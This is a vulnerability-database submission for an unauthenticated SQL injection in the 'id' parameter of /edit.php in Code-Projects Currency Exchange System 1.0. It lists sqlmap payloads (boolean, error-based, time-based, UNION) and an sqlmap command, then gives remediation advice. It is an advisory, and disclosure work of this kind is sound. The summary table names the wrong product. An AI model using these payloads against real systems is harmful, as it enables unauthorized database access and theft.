Súbít #701151: Code-Projects Currency Exchange System 1.0 /edit.php SQL Injectionbayani

KuraCode-Projects Currency Exchange System 1.0 /edit.php SQL Injection
Gaskiya # ???? Vulnerability Report: Code-Projects Currency Exchange System V1.0 /edit.php SQL Injection ## ???? Summary | Detail | Content | | :--- | :--- | | **Affected Product Name** | Library System | | **Affected Version** | V1.0 | | **Vendor Homepage** | `https://code-projects.org/currency-exchange-system-in-php-with-source-code/` | | **Vulnerability Type** | SQL Injection (SQLi) | | **Affected File** | `/edit.php` | | **Affected Parameter** | `id` (GET) | | **Authentication Required** | None (No login or authorization required to exploit) | | **Submitter** | yudeshui | ----- ## ???? Description and Impact ### Root Cause The vulnerability resides in the file `/edit.php`, where the application processes user-supplied input from the **`id`** (ID) parameter. The program **directly concatenates** this parameter value into the SQL query string **without sufficient cleaning, validation, or sanitization**. ### Impact A successful attack allows an attacker to inject malicious SQL code, thereby manipulating the original database query logic. This can lead to severe consequences, including: * **Unauthorized Database Access:** Stealing sensitive data such as user information or book records. * **Data Tampering/Destruction:** Modifying, deleting, or adding records in the database. * **System Control:** In severe cases, gaining system-level control, posing a serious threat to system security and business continuity. ----- ## ????️ Vulnerability Details and PoC The vulnerability is located in the processing of the `id` parameter within a GET request. ### PoC Payload Examples The following are examples of SQL injection payloads captured during testing with the `sqlmap` tool: ``` --- Parameter: id (GET) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: id=-3347' OR 4988=4988# Type: error-based Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: id=1' OR (SELECT 6462 FROM(SELECT COUNT(*),CONCAT(0x7170626a71,(SELECT (ELT(6462=6462,1))),0x71787a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- rUwE Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id=1' AND (SELECT 2645 FROM (SELECT(SLEEP(5)))yaLb)-- WyiO Type: UNION query Title: MySQL UNION query (NULL) - 11 columns Payload: id=1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170626a71,0x6e6441484a5546536f6e4668426f4b7562425169634347644a4c7a66476e4d486274487a6254674a,0x71787a6271),NULL,NULL,NULL# --- ``` ### Sqlmap Screenshot Example (Database Enumeration) ``` sqlmap -u "http://dede:802/edit.php?id=1" --batch --dbs ``` ----- <img width="1364" height="504" alt="Image" src="https://github.com/user-attachments/assets/ca15da0d-e960-4499-b26d-863a8ee417b4" /> ## ✅ Suggested Repair Measures To completely resolve this SQL injection issue and enhance overall system security, the following defensive coding practices are strongly recommended: ### 1\. Use Prepared Statements and Parameter Binding (Primary Defense) This is the most effective method against SQL injection. Prepared statements separate the structure of the SQL command from the user-supplied data, ensuring the input is treated as a literal string value and cannot be interpreted as executable SQL code. * **Action:** Rewrite all database queries in `/edit.php` (and all other files) to use **Prepared Statements** (e.g., using **`mysqli_prepare()`** or **PDO** with parameter binding). ### 2\. Strict Input Validation and Filtering Strictly validate and filter all user input data to ensure it conforms to the expected format, type, and length. * **Action:** For parameters like `id` which should be numeric, use PHP functions like **`filter_var()`** or **`is_numeric()`** for strict checking. ### 3\. Minimize Database User Permissions Adhere to the Principle of Least Privilege. The database account used by the web application for daily operations should only possess the minimum necessary permissions. * **Action:** Ensure the application's database user **does not** have administrative privileges (e.g., `DROP`, `ALTER`, or file system access) to limit the impact of a successful breach. ### 4\. Regular Security Audits Establish a routine process for security code reviews and auditing to proactively identify and fix potential vulnerabilities before they are exploited. ----- Would you like me to provide a specific code example in PHP demonstrating how to use **prepared statements** to fix this vulnerability?
Manga⚠️ https://github.com/rassec2/dbcve/issues/12
Màdùmga
 yudeshui (UID 91129)
Furta11/25/2025 13:43 (3 Wurɗi 전)
Gargajiya12/07/2025 16:18 (12 days later)
HalittaShingilam
VulDB gite334657 [code-projects Currency Exchange System 1.0 /edit.php ID SQL Injection]
Nganji20

GurɗoGumtiGada

Do you need the next level of professionalism?

Upgrade your account now!